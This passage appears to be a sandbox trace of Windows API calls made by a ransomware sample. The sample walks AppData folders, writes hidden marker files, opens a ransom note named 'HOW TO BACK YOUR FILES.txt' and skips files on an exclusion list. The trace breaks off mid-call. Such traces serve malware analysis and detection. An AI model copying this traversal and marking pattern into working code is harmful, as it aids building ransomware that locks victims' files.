(hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.295] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.295] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.295] CloseHandle (hObject=0x2b8) returned 1 [0054.295] CloseHandle (hObject=0x2c4) returned 1 [0054.295] GetCurrentThreadId () returned 0xfa8 [0054.295] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0054.295] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs" [0054.295] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc83f90 | out: hHeap=0xc50000) returned 1 [0054.295] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0054.295] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs" [0054.295] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\" [0054.295] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3" [0054.295] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\chs\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.296] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.298] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.299] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.300] CloseHandle (hObject=0x2c4) returned 1 [0054.301] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs") returned 57 [0054.301] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.301] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x856132fc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73248 [0054.301] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.301] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.301] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.301] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.301] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe8923b24, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xe8923b24, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x856132fc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.301] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.301] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.301] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.301] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.301] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.301] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x856132fc, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x856132fc, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x856132fc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.301] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.301] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.301] FindNextFileW (in: hFindFile=0xc73248, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x856132fc, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x856132fc, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x856132fc, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.301] FindClose (in: hFindFile=0xc73248 | out: hFindFile=0xc73248) returned 1 [0054.301] lstrcpyW (in: lpString1=0x30aeb1c, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.301] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\InputMethod\\Chs\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\inputmethod\\chs\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.303] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.303] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.303] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.303] CloseHandle (hObject=0x2b8) returned 1 [0054.304] CloseHandle (hObject=0x2c4) returned 1 [0054.304] GetCurrentThreadId () returned 0xfa8 [0054.304] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0054.304] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel" [0054.304] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc611e0 | out: hHeap=0xc50000) returned 1 [0054.304] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0054.304] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel" [0054.304] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\" [0054.304] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3" [0054.304] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.304] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.307] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.308] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.308] CloseHandle (hObject=0x2c4) returned 1 [0054.308] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel") returned 47 [0054.308] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.308] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72f88 [0054.308] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.308] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.308] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.308] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.308] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x208e9b07, ftCreationTime.dwHighDateTime=0x1d327b4, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.308] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.309] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.309] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.309] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.309] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.309] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8563907c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8563907c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.309] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.309] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.309] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="Tiger4444.exe") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2=".") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="..") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="windows") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="bootmgr") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="pagefile.sys") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="boot") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="ids.txt") returned 1 [0054.309] lstrcmpiW (lpString1="XLSTART", lpString2="NTUSER.DAT") returned 1 [0054.309] lstrcpyW (in: lpString1=0x30aeb08, lpString2="XLSTART" | out: lpString1="XLSTART") returned="XLSTART" [0054.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66660 [0054.309] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x70) returned 0xc89c20 [0054.309] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66668 | out: ListHead=0xc66828, ListEntry=0xc66668) returned 0xc66568 [0054.309] FindNextFileW (in: hFindFile=0xc72f88, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x12e96cf, ftLastWriteTime.dwHighDateTime=0x1d327c7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XLSTART", cAlternateFileName="")) returned 0 [0054.309] FindClose (in: hFindFile=0xc72f88 | out: hFindFile=0xc72f88) returned 1 [0054.309] lstrcpyW (in: lpString1=0x30aeb08, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.309] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.309] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.310] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.310] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.310] CloseHandle (hObject=0x2b8) returned 1 [0054.310] CloseHandle (hObject=0x2c4) returned 1 [0054.310] GetCurrentThreadId () returned 0xfa8 [0054.310] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66668 [0054.310] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0054.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c20 | out: hHeap=0xc50000) returned 1 [0054.310] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66660 | out: hHeap=0xc50000) returned 1 [0054.310] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0054.310] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0054.310] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3" [0054.310] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\xlstart\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.312] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0054.314] FlushFileBuffers (hFile=0x2c4) returned 1 [0054.315] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.315] CloseHandle (hObject=0x2c4) returned 1 [0054.339] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned 55 [0054.339] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.339] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0054.339] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.339] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.339] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0054.339] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.339] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12e96cf, ftCreationTime.dwHighDateTime=0x1d327c7, ftLastAccessTime.dwLowDateTime=0x12e96cf, ftLastAccessTime.dwHighDateTime=0x1d327c7, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.339] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.339] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.339] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0054.339] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.339] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.339] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8563907c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8563907c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.339] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.339] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.339] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8563907c, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8563907c, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8563907c, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0054.339] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0054.339] lstrcpyW (in: lpString1=0x30aeb18, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\excel\\xlstart\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0054.340] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0054.340] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0054.340] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0054.341] CloseHandle (hObject=0x2b8) returned 1 [0054.341] CloseHandle (hObject=0x2c4) returned 1 [0054.341] GetCurrentThreadId () returned 0xfa8 [0054.341] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66568 [0054.341] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0054.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc79708 | out: hHeap=0xc50000) returned 1 [0054.341] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66560 | out: hHeap=0xc50000) returned 1 [0054.341] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0054.341] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0054.341] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3" [0054.341] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\document building blocks\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0054.342] WriteFile (in: 